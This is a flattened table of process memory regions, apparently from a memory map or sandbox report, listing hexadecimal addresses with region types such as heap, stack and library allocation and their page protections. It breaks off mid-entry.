8B36000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
5850000
|
heap
|
page read and write
|
||
57FD000
|
heap
|
page read and write
|
||
8A0E000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
432C000
|
stack
|
page read and write
|
||
4CF2000
|
heap
|
page read and write
|
||
7CF000
|
heap
|
page read and write
|
||
3551000
|
heap
|
page read and write
|
||
50D0000
|
heap
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
35B0000
|
heap
|
page readonly
|
||
125F000
|
stack
|
page read and write
|
||
50AB000
|
stack
|
page read and write
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
7A82000
|
heap
|
page read and write
|
||
5FCA000
|
heap
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
6627000
|
trusted library allocation
|
page read and write
|
||
8140000
|
trusted library allocation
|
page read and write
|
||
2A6C000
|
heap
|
page read and write
|
||
7EAF000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
609E000
|
heap
|
page read and write
|
||
721D000
|
stack
|
page read and write
|
||
71BE000
|
stack
|
page read and write
|
||
7DA0000
|
trusted library allocation
|
page execute and read and write
|
||
7C56000
|
heap
|
page read and write
|
||
72E0000
|
trusted library allocation
|
page read and write
|
||
3555000
|
heap
|
page read and write
|
||
49D8000
|
trusted library allocation
|
page read and write
|
||
7BCA000
|
heap
|
page read and write
|
||
89AE000
|
stack
|
page read and write
|
||
6083000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
5D47000
|
trusted library allocation
|
page read and write
|
||
57F5000
|
heap
|
page read and write
|
||
2A14000
|
heap
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
622F000
|
trusted library allocation
|
page read and write
|
||
6672000
|
heap
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
D02000
|
direct allocation
|
page read and write
|
||
2AD8000
|
heap
|
page read and write
|
||
3CC000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7D30000
|
heap
|
page execute and read and write
|
||
39C000
|
stack
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
7110000
|
heap
|
page execute and read and write
|
||
734B000
|
heap
|
page read and write
|
||
35C8000
|
heap
|
page read and write
|
||
5B3D000
|
stack
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
2A4A000
|
heap
|
page read and write
|
||
6083000
|
heap
|
page read and write
|
||
584B000
|
heap
|
page read and write
|
||
7350000
|
heap
|
page read and write
|
||
2E40000
|
heap
|
page readonly
|
||
6EB0000
|
heap
|
page read and write
|
||
7B70000
|
heap
|
page read and write
|
||
607F000
|
heap
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
6182000
|
trusted library allocation
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
3569000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
293E000
|
stack
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
4AE5000
|
trusted library allocation
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
67C1000
|
heap
|
page read and write
|
||
28FE000
|
stack
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
6862000
|
heap
|
page read and write
|
||
7A6E000
|
stack
|
page read and write
|
||
7CCA000
|
trusted library allocation
|
page read and write
|
||
66BB000
|
heap
|
page read and write
|
||
67C1000
|
heap
|
page read and write
|
||
2952000
|
heap
|
page read and write
|
||
4B80000
|
heap
|
page read and write
|
||
6BCA000
|
stack
|
page read and write
|
||
78D000
|
heap
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
6E2E000
|
stack
|
page read and write
|
||
5FCA000
|
heap
|
page read and write
|
||
57B5000
|
heap
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
4DA7000
|
trusted library allocation
|
page read and write
|
||
CF2000
|
direct allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
356A000
|
heap
|
page read and write
|
||
55E7000
|
trusted library allocation
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
57B0000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
353B000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
6EFA000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
67C9000
|
heap
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
67C1000
|
heap
|
page read and write
|
||
7E6F000
|
heap
|
page read and write
|
||
3504000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
4F58000
|
trusted library allocation
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
4AFC000
|
trusted library allocation
|
page read and write
|
||
3554000
|
trusted library allocation
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
34BE000
|
stack
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
7E2E000
|
stack
|
page read and write
|
||
29B0000
|
trusted library allocation
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
60E7000
|
heap
|
page read and write
|
||
2C7F000
|
stack
|
page read and write
|
||
7C53000
|
heap
|
page read and write
|
||
6E81000
|
heap
|
page read and write
|
||
2990000
|
trusted library allocation
|
page read and write
|
||
4C91000
|
heap
|
page read and write
|
||
6A40000
|
trusted library allocation
|
page read and write
|
||
557D000
|
stack
|
page read and write
|
||
76FA000
|
stack
|
page read and write
|
||
728C000
|
trusted library allocation
|
page read and write
|
||
6B0E000
|
stack
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
281E000
|
stack
|
page read and write
|
||
505F000
|
stack
|
page read and write
|
||
2AB9000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
4D48000
|
heap
|
page read and write
|
||
44EE000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
5ED6000
|
heap
|
page read and write
|
||
50CE000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
7220000
|
trusted library allocation
|
page read and write
|
||
3568000
|
heap
|
page read and write
|
||
43C0000
|
heap
|
page read and write
|
||
2A37000
|
heap
|
page read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
6B30000
|
trusted library allocation
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
8900000
|
trusted library allocation
|
page read and write
|
||
72D0000
|
heap
|
page read and write
|
||
2D9D000
|
trusted library allocation
|
page execute and read and write
|
||
6A35000
|
heap
|
page execute and read and write
|
||
2980000
|
trusted library allocation
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
8AF8000
|
heap
|
page read and write
|
||
3555000
|
heap
|
page read and write
|
||
76E0000
|
trusted library allocation
|
page read and write
|
||
65B4000
|
heap
|
page read and write
|
||
6EBE000
|
stack
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
3553000
|
trusted library allocation
|
page execute and read and write
|
||
3541000
|
heap
|
page read and write
|
||
E80000
|
heap
|
page read and write
|
||
611F000
|
stack
|
page read and write
|
||
5848000
|
heap
|
page read and write
|
||
67C9000
|
heap
|
page read and write
|
||
8120000
|
trusted library allocation
|
page execute and read and write
|
||
4FF4000
|
trusted library allocation
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
7E51000
|
heap
|
page read and write
|
||
55B0000
|
heap
|
page execute and read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
60E3000
|
heap
|
page read and write
|
||
8110000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
43C7000
|
heap
|
page read and write
|
||
34A1000
|
heap
|
page read and write
|
||
32FB000
|
stack
|
page read and write
|
||
70F000
|
stack
|
page read and write
|
||
2AC7000
|
heap
|
page read and write
|
||
7E86000
|
heap
|
page read and write
|
||
89C0000
|
heap
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
7312000
|
heap
|
page read and write
|
||
4CE4000
|
trusted library allocation
|
page read and write
|
||
6E42000
|
heap
|
page read and write
|
||
8CD1000
|
trusted library allocation
|
page read and write
|
||
65E9000
|
trusted library allocation
|
page read and write
|
||
72F0000
|
trusted library allocation
|
page read and write
|
||
6561000
|
heap
|
page read and write
|
||
34A1000
|
heap
|
page read and write
|
||
6960000
|
trusted library allocation
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
60CE000
|
heap
|
page read and write
|
||
7F6000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
438F000
|
trusted library allocation
|
page read and write
|
||
7E3D000
|
stack
|
page read and write
|
||
2E3E000
|
stack
|
page read and write
|
||
7090000
|
trusted library allocation
|
page read and write
|
||
4AEC000
|
stack
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
6A8D000
|
stack
|
page read and write
|
||
89B0000
|
heap
|
page read and write
|
||
52F0000
|
heap
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
754E000
|
stack
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
6836000
|
heap
|
page read and write
|
||
5590000
|
trusted library allocation
|
page read and write
|
||
484E000
|
stack
|
page read and write
|
||
6809000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
3569000
|
heap
|
page read and write
|
||
705000
|
heap
|
page read and write
|
||
57F8000
|
heap
|
page read and write
|
||
60E8000
|
heap
|
page read and write
|
||
688F000
|
heap
|
page read and write
|
||
76B0000
|
trusted library allocation
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
2A65000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
57D4000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
4C5E000
|
heap
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
58A9000
|
trusted library allocation
|
page read and write
|
||
3554000
|
heap
|
page read and write
|
||
5FCC000
|
heap
|
page read and write
|
||
6779000
|
heap
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
8B19000
|
heap
|
page read and write
|
||
4370000
|
trusted library allocation
|
page execute and read and write
|
||
617A000
|
trusted library allocation
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
34DF000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
812B000
|
stack
|
page read and write
|
||
347E000
|
unkown
|
page read and write
|
||
639000
|
stack
|
page read and write
|
||
51EE000
|
stack
|
page read and write
|
||
6B3B000
|
stack
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
806E000
|
stack
|
page read and write
|
||
7348000
|
heap
|
page read and write
|
||
53FE000
|
stack
|
page read and write
|
||
719E000
|
stack
|
page read and write
|
||
77FB000
|
stack
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
7ED000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
29B5000
|
trusted library allocation
|
page execute and read and write
|
||
48E4000
|
trusted library allocation
|
page read and write
|
||
36BC000
|
heap
|
page read and write
|
||
2A34000
|
trusted library allocation
|
page read and write
|
||
2984000
|
trusted library allocation
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
6500000
|
trusted library allocation
|
page read and write
|
||
57C3000
|
heap
|
page read and write
|
||
712E000
|
stack
|
page read and write
|
||
67CD000
|
heap
|
page read and write
|
||
3570000
|
trusted library allocation
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
6081000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
3691000
|
heap
|
page read and write
|
||
2AFF000
|
heap
|
page read and write
|
||
1550000
|
heap
|
page read and write
|
||
2911000
|
heap
|
page read and write
|
||
6FBE000
|
stack
|
page read and write
|
||
5FD3000
|
heap
|
page read and write
|
||
42D0000
|
trusted library allocation
|
page read and write
|
||
543E000
|
stack
|
page read and write
|
||
6083000
|
heap
|
page read and write
|
||
58C0000
|
heap
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
60CC000
|
heap
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
4CDE000
|
heap
|
page read and write
|
||
6A90000
|
trusted library allocation
|
page read and write
|
||
57C0000
|
heap
|
page read and write
|
||
3572000
|
heap
|
page read and write
|
||
60DB000
|
heap
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
291B000
|
heap
|
page read and write
|
||
2A40000
|
trusted library allocation
|
page read and write
|
||
2A5A000
|
trusted library allocation
|
page execute and read and write
|
||
2AAE000
|
heap
|
page read and write
|
||
2D80000
|
trusted library allocation
|
page read and write
|
||
5623000
|
trusted library allocation
|
page read and write
|
||
680E000
|
heap
|
page read and write
|
||
74E000
|
stack
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
609E000
|
heap
|
page read and write
|
||
2AC3000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
2A3F000
|
heap
|
page read and write
|
||
6DEB000
|
stack
|
page read and write
|
||
2AE4000
|
heap
|
page read and write
|
||
71FD000
|
stack
|
page read and write
|
||
2A3D000
|
trusted library allocation
|
page execute and read and write
|
||
6F95000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
7C8000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
direct allocation
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
7E60000
|
heap
|
page read and write
|
||
6082000
|
heap
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
4CED000
|
heap
|
page read and write
|
||
7BEA000
|
heap
|
page read and write
|
||
8B20000
|
heap
|
page read and write
|
||
5581000
|
trusted library allocation
|
page read and write
|
||
4C71000
|
heap
|
page read and write
|
||
354E000
|
heap
|
page read and write
|
||
7BDD000
|
heap
|
page read and write
|
||
764D000
|
stack
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
6227000
|
trusted library allocation
|
page read and write
|
||
60A3000
|
heap
|
page read and write
|
||
4380000
|
trusted library allocation
|
page read and write
|
||
79EE000
|
stack
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
7DD000
|
heap
|
page read and write
|
||
4CD0000
|
heap
|
page execute and read and write
|
||
6831000
|
heap
|
page read and write
|
||
6188000
|
trusted library allocation
|
page read and write
|
||
702D000
|
heap
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
733C000
|
heap
|
page read and write
|
||
60DB000
|
heap
|
page read and write
|
||
79AE000
|
stack
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
6817000
|
heap
|
page read and write
|
||
54A5000
|
heap
|
page execute and read and write
|
||
792000
|
heap
|
page read and write
|
||
4C0E000
|
stack
|
page read and write
|
||
6E4E000
|
stack
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
35E0000
|
heap
|
page read and write
|
||
73E1000
|
heap
|
page read and write
|
||
7DBE000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
6E2E000
|
stack
|
page read and write
|
||
7170000
|
heap
|
page read and write
|
||
682F000
|
heap
|
page read and write
|
||
623B000
|
trusted library allocation
|
page read and write
|
||
60C9000
|
heap
|
page read and write
|
||
6C40000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
69CB000
|
stack
|
page read and write
|
||
79F000
|
heap
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
35A0000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
67BE000
|
heap
|
page read and write
|
||
72D0000
|
trusted library allocation
|
page read and write
|
||
60E9000
|
heap
|
page read and write
|
||
6F03000
|
heap
|
page read and write
|
||
34D3000
|
heap
|
page read and write
|
||
7E30000
|
heap
|
page read and write
|
||
2AC6000
|
heap
|
page read and write
|
||
2947000
|
heap
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
heap
|
page read and write
|
||
6F64000
|
heap
|
page read and write
|
||
5ED6000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
601E000
|
stack
|
page read and write
|
||
4CF1000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
5090000
|
heap
|
page read and write
|
||
70AE000
|
stack
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
42D8000
|
trusted library allocation
|
page read and write
|
||
2968000
|
heap
|
page read and write
|
||
505B000
|
trusted library allocation
|
page read and write
|
||
60D8000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page read and write
|
||
7B10000
|
direct allocation
|
page read and write
|
||
360A000
|
heap
|
page read and write
|
||
7BFE000
|
heap
|
page read and write
|
||
7C08000
|
heap
|
page read and write
|
||
289E000
|
stack
|
page read and write
|
||
7DFF000
|
stack
|
page read and write
|
||
14C000
|
stack
|
page read and write
|
||
4EC2000
|
trusted library allocation
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
3553000
|
heap
|
page read and write
|
||
731A000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
6FA2000
|
heap
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
4FA0000
|
trusted library allocation
|
page read and write
|
||
7AD0000
|
direct allocation
|
page read and write
|
||
6080000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
617E000
|
trusted library allocation
|
page read and write
|
||
2A37000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
436E000
|
stack
|
page read and write
|
||
4C69000
|
heap
|
page read and write
|
||
4BCE000
|
stack
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
60D8000
|
heap
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
5FC1000
|
heap
|
page read and write
|
||
2A18000
|
heap
|
page read and write
|
||
7021000
|
heap
|
page read and write
|
||
6BEE000
|
trusted library allocation
|
page read and write
|
||
6842000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
3565000
|
heap
|
page read and write
|
||
2A0C000
|
heap
|
page read and write
|
||
6A30000
|
heap
|
page execute and read and write
|
||
67C7000
|
heap
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
8E30000
|
trusted library allocation
|
page read and write
|
||
6BBB000
|
stack
|
page read and write
|
||
51F6000
|
trusted library allocation
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
4F5C000
|
stack
|
page read and write
|
||
88FD000
|
trusted library allocation
|
page read and write
|
||
6E84000
|
heap
|
page read and write
|
||
6B4D000
|
stack
|
page read and write
|
||
2960000
|
trusted library allocation
|
page read and write
|
||
5E70000
|
heap
|
page read and write
|
||
81F0000
|
trusted library allocation
|
page read and write
|
||
6679000
|
heap
|
page read and write
|
||
625C000
|
stack
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
2D90000
|
trusted library allocation
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
4CE2000
|
heap
|
page read and write
|
||
4D47000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
7CC7000
|
trusted library allocation
|
page read and write
|
||
7700000
|
trusted library allocation
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
66BA000
|
heap
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
2DA0000
|
trusted library allocation
|
page read and write
|
||
6C7E000
|
stack
|
page read and write
|
||
2D2F000
|
stack
|
page read and write
|
||
8CC0000
|
trusted library allocation
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
67C7000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
6FC9000
|
heap
|
page read and write
|
||
6D7F000
|
stack
|
page read and write
|
||
682D000
|
heap
|
page read and write
|
||
67F8000
|
heap
|
page read and write
|
||
57E9000
|
heap
|
page read and write
|
||
355E000
|
heap
|
page read and write
|
||
76A0000
|
trusted library allocation
|
page read and write
|
||
2D94000
|
trusted library allocation
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
609C000
|
heap
|
page read and write
|
||
67CC000
|
heap
|
page read and write
|
||
4DB5000
|
trusted library allocation
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
3585000
|
trusted library allocation
|
page execute and read and write
|
||
6181000
|
trusted library allocation
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
676A000
|
trusted library allocation
|
page read and write
|
||
355B000
|
heap
|
page read and write
|
||
6173000
|
trusted library allocation
|
page read and write
|
||
78C000
|
heap
|
page read and write
|
||
6177000
|
trusted library allocation
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
70F0000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
29B2000
|
trusted library allocation
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
6028000
|
heap
|
page read and write
|
||
4CE1000
|
heap
|
page read and write
|
||
4C70000
|
heap
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
10FE000
|
stack
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
7D4D000
|
stack
|
page read and write
|
||
8A30000
|
trusted library allocation
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
617C000
|
trusted library allocation
|
page read and write
|
||
7C5C000
|
heap
|
page read and write
|
||
7CBE000
|
stack
|
page read and write
|
||
5FCA000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
5716000
|
trusted library allocation
|
page read and write
|
||
343E000
|
unkown
|
page read and write
|
||
5CE9000
|
trusted library allocation
|
page read and write
|
||
60E5000
|
heap
|
page read and write
|
||
50D1000
|
trusted library allocation
|
page read and write
|
||
8B41000
|
heap
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
8AE5000
|
heap
|
page read and write
|
||
4CEC000
|
heap
|
page read and write
|
||
8345000
|
trusted library allocation
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
698D000
|
stack
|
page read and write
|
||
607F000
|
heap
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
2E9D000
|
heap
|
page read and write
|
||
853C000
|
stack
|
page read and write
|
||
6071000
|
heap
|
page read and write
|
||
65C1000
|
trusted library allocation
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
6DAD000
|
stack
|
page read and write
|
||
55C1000
|
trusted library allocation
|
page read and write
|
||
7342000
|
heap
|
page read and write
|
||
6870000
|
heap
|
page read and write
|
||
357A000
|
trusted library allocation
|
page execute and read and write
|
||
6128000
|
heap
|
page read and write
|
||
4581000
|
trusted library allocation
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
70F0000
|
trusted library section
|
page read and write
|
||
4DB8000
|
trusted library allocation
|
page read and write
|
||
4B00000
|
trusted library allocation
|
page read and write
|
||
2A53000
|
heap
|
page read and write
|
||
47A6000
|
heap
|
page read and write
|
||
7300000
|
trusted library allocation
|
page read and write
|
||
CF6000
|
direct allocation
|
page read and write
|
||
36C7000
|
heap
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
6826000
|
heap
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
3554000
|
heap
|
page read and write
|
||
777B000
|
stack
|
page read and write
|
||
367F000
|
stack
|
page read and write
|
||
5881000
|
trusted library allocation
|
page read and write
|
||
6175000
|
trusted library allocation
|
page read and write
|
||
7D90000
|
heap
|
page read and write
|
||
55C0000
|
trusted library allocation
|
page read and write
|
||
4CF7000
|
trusted library allocation
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
6C0E000
|
trusted library allocation
|
page read and write
|
||
684B000
|
heap
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
67CF000
|
heap
|
page read and write
|
||
60DB000
|
heap
|
page read and write
|
||
7015000
|
heap
|
page read and write
|
||
63E0000
|
trusted library allocation
|
page read and write
|
||
42BE000
|
stack
|
page read and write
|
||
4CDB000
|
heap
|
page read and write
|
||
4CF3000
|
heap
|
page read and write
|
||
685B000
|
heap
|
page read and write
|
||
4DD6000
|
trusted library allocation
|
page read and write
|
||
7070000
|
trusted library allocation
|
page read and write
|
||
6846000
|
heap
|
page read and write
|
||
67FD000
|
heap
|
page read and write
|
||
6746000
|
heap
|
page read and write
|
||
69E000
|
stack
|
page read and write
|
||
686B000
|
heap
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
3619000
|
heap
|
page read and write
|
||
584B000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
81EC000
|
trusted library allocation
|
page read and write
|
||
547E000
|
stack
|
page read and write
|
||
60D6000
|
heap
|
page read and write
|
||
76BE000
|
stack
|
page read and write
|
||
28E9000
|
heap
|
page read and write
|
||
1280000
|
heap
|
page read and write
|
||
67C9000
|
heap
|
page read and write
|
||
6773000
|
trusted library allocation
|
page read and write
|
||
4DA2000
|
trusted library allocation
|
page read and write
|
||
8AD2000
|
heap
|
page read and write
|
||
6DEE000
|
stack
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page execute and read and write
|
||
35D0000
|
trusted library allocation
|
page execute and read and write
|
||
7CF0000
|
trusted library allocation
|
page execute and read and write
|
||
3540000
|
heap
|
page read and write
|
||
8CB0000
|
trusted library allocation
|
page execute and read and write
|
||
6081000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
344E000
|
stack
|
page read and write
|
||
356B000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
67EC000
|
heap
|
page read and write
|
||
7BC5000
|
heap
|
page read and write
|
||
760E000
|
stack
|
page read and write
|
||
6741000
|
heap
|
page read and write
|
||
4DAF000
|
trusted library allocation
|
page read and write
|
||
4DE6000
|
trusted library allocation
|
page read and write
|
||
7D8E000
|
stack
|
page read and write
|
||
29D8000
|
heap
|
page read and write
|
||
2AA3000
|
heap
|
page read and write
|
||
6220000
|
trusted library allocation
|
page read and write
|
||
67F4000
|
heap
|
page read and write
|
||
2A4B000
|
heap
|
page read and write
|
||
4881000
|
trusted library allocation
|
page read and write
|
||
763E000
|
stack
|
page read and write
|
||
2A79000
|
heap
|
page read and write
|
||
767F000
|
stack
|
page read and write
|
||
3568000
|
heap
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
6831000
|
heap
|
page read and write
|
||
6FFF000
|
stack
|
page read and write
|
||
8A90000
|
heap
|
page read and write
|
||
8A20000
|
trusted library allocation
|
page read and write
|
||
5AA0000
|
trusted library allocation
|
page read and write
|
||
67C9000
|
heap
|
page read and write
|
||
715E000
|
stack
|
page read and write
|
||
58E8000
|
trusted library allocation
|
page read and write
|
||
3657000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
E3D000
|
stack
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
5FC1000
|
heap
|
page read and write
|
||
7BF8000
|
heap
|
page read and write
|
||
6822000
|
heap
|
page read and write
|
||
6185000
|
trusted library allocation
|
page read and write
|
||
2A17000
|
heap
|
page read and write
|
||
298D000
|
trusted library allocation
|
page execute and read and write
|
||
3540000
|
trusted library allocation
|
page read and write
|
||
5013000
|
trusted library allocation
|
page read and write
|
||
7DBE000
|
stack
|
page read and write
|
||
7DEE000
|
stack
|
page read and write
|
||
67C7000
|
heap
|
page read and write
|
||
563F000
|
stack
|
page read and write
|
||
6E30000
|
heap
|
page execute and read and write
|
||
67FD000
|
heap
|
page read and write
|
||
67D0000
|
heap
|
page read and write
|
||
47A4000
|
heap
|
page read and write
|
||
6490000
